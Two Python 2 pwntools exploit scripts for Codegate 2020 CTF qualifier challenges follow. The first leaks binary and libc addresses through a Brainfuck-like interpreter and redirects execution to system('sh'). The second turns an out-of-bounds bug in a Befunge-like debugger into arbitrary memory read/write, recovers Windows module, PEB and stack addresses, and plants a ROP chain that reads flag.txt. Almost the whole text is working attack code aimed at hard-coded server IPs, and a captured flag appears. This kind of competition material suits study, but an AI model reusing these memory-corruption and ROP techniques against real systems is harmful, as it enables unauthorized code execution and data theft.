Codegate 2020 Quals
from pwn import *
# Exploit script 1 (Codegate 2020 Quals). Python 2 (print statements) with
# pwntools. Every numeric offset below is hard-coded for the specific
# challenge binary and libc and cannot be checked from this file alone.
#s = remote("0", 1234)
s = remote("58.229.240.181", 7777)
context.log_level = "debug"
s.recvuntil(">>>")
# One program line for the remote interpreter. It is built from the
# characters + [ ] < > . , and looks Brainfuck-like; what it does depends on
# the remote implementation, which is not shown here.
s.sendline("+[[."+"<"*0x8+"[.>]"+"<"*(0x6e+0x8)+"[.>]"+">"*(0x10-0x6)+"[,>]"+"<"*(0x6+0x10)+"[,>]"+">"*(0x80-0xe)+",>,<.]]")
# Read until a 0x7f byte arrives, keep the last 6 bytes, zero-extend to 8 and
# unpack as a 64-bit integer; the subtracted constant is a challenge-specific
# offset that turns the leaked pointer into what is printed as BASE.
base = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x201090
print "BASE @ " + hex(base)
# Same leak pattern for the second pointer; the trailing comment records an
# alternative offset the author tried.
libc = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x0000000000110140 #- 0x18eef0
print "libc @ " + hex(libc)
# Addresses derived from the two leaks (offsets hard-coded).
system = libc + 0x4f440
alloc = base + 0x0000927
# Send the low 6 bytes of each 8-byte address, then the string "sh".
s.send(p64(system)[:6])
s.send(p64(alloc)[:6])
s.send("sh")
# Disabled alternative kept as a bare string literal (a no-op expression
# statement); it is never sent.
'''
ret = libc + 0x1101a9
raw_input()
s.send(p64(libc+0x4f322))
'''
s.interactive()
from pwn import *
# Exploit script 2 (Codegate 2020 Quals). Python 2 (print statements) with
# pwntools. Connects to the challenge service and uploads a small program,
# then drives the service's debugger commands ("run", "cycle", "step").
#s = remote("14.47.79.136", 54321)
#context.log_level = 'debug'
s = remote("183.107.102.15",54321)
#s = remote("52.78.198.47",54321)
# Program lines sent to the service. The characters (v > < ^ & | p g . #)
# suggest a 2-D Befunge-like language; the exact semantics live in the remote
# interpreter and are not verifiable here. The last line is filler.
code = []
code.append("v>>>>>>>>>>&##s")
code.append(">&|>>>>>>>>>^")
code.append(">&>&&&p&>>>&|")
code.append("<<<<<<.g&&<<v")
code.append("<<<<<<<<<<|&<")
code.append("<<<<<<p&&&<<v")
code.append("FAKE"*20)
# Protocol as used here: a width ("80"), the number of lines, then each line.
s.sendline("80")
s.sendline(str(len(code)))
for line in code:
    print line
    s.sendline(line)
# BuG Trigger
# Two run/cycle rounds, each followed by a line of numeric input for the
# program. The meaning of the numbers is challenge-specific; the second
# input line has the same leading prefix the oob_* helpers below reuse.
s.recvuntil(">")
s.sendline("run")
s.recvuntil(">")
s.sendline("cycle 100")
s.sendline("1 115")
s.recvuntil(">")
s.sendline("run")
s.recvuntil(">")
s.sendline("cycle 100")
s.sendline("0 62 12 0 255 1")
def oob_read_u8(x, y):
    """Read one byte from the remote program state and return it as a 1-byte string.

    Issues "run" then "step 100" (each after a ">" prompt), sends a numeric
    input line whose fixed prefix "0 62 12 0 255 0 1" is challenge-specific
    and whose last two numbers are x and y (presumably coordinates in the
    program's 2-D field -- not verifiable here), then parses the integer that
    follows the first space in the reply ending with "executed." and packs it
    with p8.

    Uses the module-level connection `s`.
    """
    for cmd in ("run", "step 100"):
        s.recvuntil(">")
        s.sendline(cmd)
    s.sendline("0 62 12 0 255 0 1 %d %d" % (x, y))
    reply = s.recvuntil("executed.")
    value = int(reply.split(" ")[1], 10)
    return p8(value)
def oob_read_u64(x, y):
    """Read 8 consecutive bytes starting at (x, y) and unpack them with u64.

    Bytes are fetched one at a time with oob_read_u8 at x, x+1, ..., x+7
    (same y) and concatenated in that order before unpacking.
    """
    raw = "".join(oob_read_u8(x + offset, y) for offset in range(8))
    return u64(raw)
def oob_write_u8(x, y, val):
    """Write the byte value `val` at (x, y) in the remote program state.

    Mirrors oob_read_u8: "run" then "step 100" after each ">" prompt, then a
    numeric input line with the challenge-specific prefix "0 62 12 0 255 0 0"
    followed by val, x, y. No reply is consumed here.

    Uses the module-level connection `s`.
    """
    for cmd in ("run", "step 100"):
        s.recvuntil(">")
        s.sendline(cmd)
    s.sendline("0 62 12 0 255 0 0 %d %d %d" % (val, x, y))
def oob_write_u64(x, y, val):
    """Write the 64-bit integer `val` byte by byte starting at (x, y).

    p64 packs the value; byte k of the packing goes to (x + k, y) via
    oob_write_u8, so the write spans 8 consecutive x positions.
    """
    for offset, byte in enumerate(p64(val)):
        oob_write_u8(x + offset, y, u8(byte))
def arb_read(addr):
    """Return the 64-bit value read after storing `addr` at (0x20, 0x5).

    The (0x20, 0x5) slot and the (0x0, 0x6) read location are fixed for this
    challenge; presumably the first acts as a pointer the second dereferences,
    but that is the remote program's behaviour, not visible here.
    """
    ptr_x, ptr_y = 0x20, 0x5
    oob_write_u64(ptr_x, ptr_y, addr)
    return oob_read_u64(0x0, 0x6)
def arb_read_u16(addr):
    """Return the little-endian 16-bit value assembled from two single-byte reads.

    Each byte is obtained the same way arb_read works: store the address at
    (0x20, 0x5), then read one byte at (0x0, 0x6). The byte at `addr` is the
    low half, the byte at `addr + 1` the high half.
    """
    def byte_at(a):
        oob_write_u64(0x20, 0x5, a)
        return u8(oob_read_u8(0x0, 0x6))

    lo = byte_at(addr)
    hi = byte_at(addr + 1)
    return (hi << 8) | lo
def arb_write(addr, val):
    """Store `addr` at (0x20, 0x5), then write the 64-bit `val` at (0x0, 0x6).

    Returns whatever oob_write_u64 returns (it has no return statement, so
    this is None).
    """
    ptr_x, ptr_y = 0x20, 0x5
    oob_write_u64(ptr_x, ptr_y, addr)
    return oob_write_u64(0x0, 0x6, val)
def hexdump(addr, size=0x10):
    """Print `size` 64-bit words read with arb_read from `addr` upward.

    Prints a banner line, then one hex() line per 8-byte word; `size` is the
    number of words, not bytes. Python 2 print statements, as in the rest of
    the file.
    """
    rule = "-" * 5
    print rule + "hexdump" + rule
    for word_index in range(size):
        word = arb_read(addr + 0x8 * word_index)
        print hex(word)
# --- main sequence ---------------------------------------------------------
# Everything below is a fixed interaction with the remote service; all
# offsets are hard-coded for the challenge's Windows binary and DLLs
# (VCRUNTIME140, KERNEL32, NTDLL, ucrtbase) and are not checkable here.
# Write 0xff into five consecutive slots at x=0x30, y=0..4. Presumably this
# enlarges some bound or size field in the program state -- TODO confirm.
oob_write_u8(0x30,0,0xff)
oob_write_u8(0x30,1,0xff)
oob_write_u8(0x30,2,0xff)
oob_write_u8(0x30,3,0xff)
oob_write_u8(0x30,4,0xff)
# First 8-byte leak, printed as HEAP; it is the base all later reads start from.
leak = oob_read_u64(0x20,5)
print "HEAP @ "+hex(leak)
# Overwrite the slot the leak came from, then two 64-bit values at y=5.
oob_write_u64(0x20,5,0x414141414141)
oob_write_u64(0x30,5,0x10000)
oob_write_u64(0x38,5,0x10000)
#hexdump(leak, 0x15)
# Module base recovery: each step reads one pointer through the previous
# module and subtracts a hard-coded offset to get that module's base.
VCRUNTIME140 = arb_read(leak+13*8) - 0xe000
print "VCRUNTIME140 @ "+hex(VCRUNTIME140)
KERNEL32 = arb_read(VCRUNTIME140+0xe008) - 0x001cd20
print "KERNEL32 @ "+hex(KERNEL32)
NTDLL = arb_read(KERNEL32+0x07AB00) - 0x0d010#RtlAllocateHeap
print "NTDLL @ " + hex(NTDLL)
PebLdr = (NTDLL+0x1653C0)
print "PebLdr @ " + hex(PebLdr)
# Double dereference from PebLdr gives the main binary's base.
binBase = arb_read(arb_read(PebLdr+0x20)+0x20)
print "binBase @ "+hex(binBase)
ucrtbase = arb_read(binBase + 0x00A2B8) - 0x0c7b0
print "ucrtbase @ "+hex(ucrtbase)
# PEB from a pointer just below PebLdr; TEB assumed to sit 0x1000 above it.
PEB = arb_read(PebLdr - 0x98) - 0x80
print "PEB @ "+hex(PEB)
TEB = PEB + 0x1000
print "TEB @ "+hex(TEB)
stackAddr = arb_read(TEB + 0x10)
print "stack Address @ "+hex(stackAddr)
# Computed but not referenced again below.
stackEnd = stackAddr + (0x10000 - (stackAddr & 0xffff)) - 0x8
returnAddr = binBase + 0x00007fad
print hex(returnAddr)
# Scan the stack from stackAddr + 0x4808 in 0x10 steps, comparing only the
# low 16 bits of each slot with returnAddr. 0x1000/0x10 is Python 2 integer
# division (in Python 3 it would be a float and range() would raise).
# If nothing matches, `here` stays -1 and the write below lands at
# retPtr - 0x10; there is no check for that case.
retPtr = stackAddr + 0x4808
here = -1
for i in range(0, 0x1000/0x10):
    temp = arb_read_u16(retPtr + i*0x10)
    if temp == (returnAddr&0xffff):
        here = i
        break
print("boooom : "+hex(0x4808+here*0x10))
# Marker write into the located slot; it is overwritten again with `pivot`
# below, so this one only confirms the write path works.
arb_write(retPtr + here*0x10, 0x4141414141)
# Gadget and function addresses relative to the recovered module bases
# (the trailing comments are the author's own description of each gadget).
gadget1 = NTDLL + 0x9217b #: pop rcx ; ret
gadget2 = NTDLL + 0x057642 #: pop rdx ; ret
gadget3 = NTDLL + 0x08fb31 # pop rcx ; pop r8 ; pop r9 ; pop r10 ; pop r11 ; ret
gadget4 = NTDLL + 0x02a3b # add rsp, 0x38 ; ret
pivot = NTDLL + 0x10bba5 # add rsp, 0x508 ; ret#+ 0x6e48c # add rsp, 0x240 ; pop rdi ; ret
_open = ucrtbase + 0x000a2a30
_read = ucrtbase + 0x0016270
_puts = ucrtbase + 0x0080760
bss = binBase + 0xf000
# Store the NUL-terminated filename at bss, one character per call. Note that
# arb_write always emits a full 8-byte value, so consecutive calls overlap
# and each later write re-zeroes the 7 bytes after its character.
cmd = "flag.txt\x00"
i = 0
for c in cmd:
    arb_write(bss+ i, ord(c))
    i += 1
# Values consumed in order by the gadgets named above: arguments, the call
# target, then padding for the add-rsp gadget, three times over.
rop_chain = [
    gadget2,
    0x0,
    gadget3,
    bss,
    0x40,
    0,
    0,
    0,
    gadget1+1,
    _open,
    gadget4, 0, 0, 0, 0, 0, 0, 0,
    gadget2,
    bss+0x10,
    gadget3,
    0x3,
    0x100,
    0,
    0,
    0,
    _read,
    gadget4, 0, 0, 0, 0, 0, 0, 0,
    gadget1,
    bss+0x10,
    _puts
]
# Replace the located slot with the pivot gadget, then place the chain
# 0x508 + 0x8 bytes past it (matching the pivot's rsp adjustment plus the
# return), one 8-byte word per arb_write.
arb_write(retPtr + here*0x10, pivot)
retPtr = retPtr + here*0x10 + 0x508 + 0x8
for i, c in enumerate(rop_chain):
    arb_write(retPtr + i*0x8, c)
s.sendline("quit")
#CODEGATE2020{pwn1ng_da7_d3bugger_w17h_an0th3r_d1m3nsi0n}
s.interactive()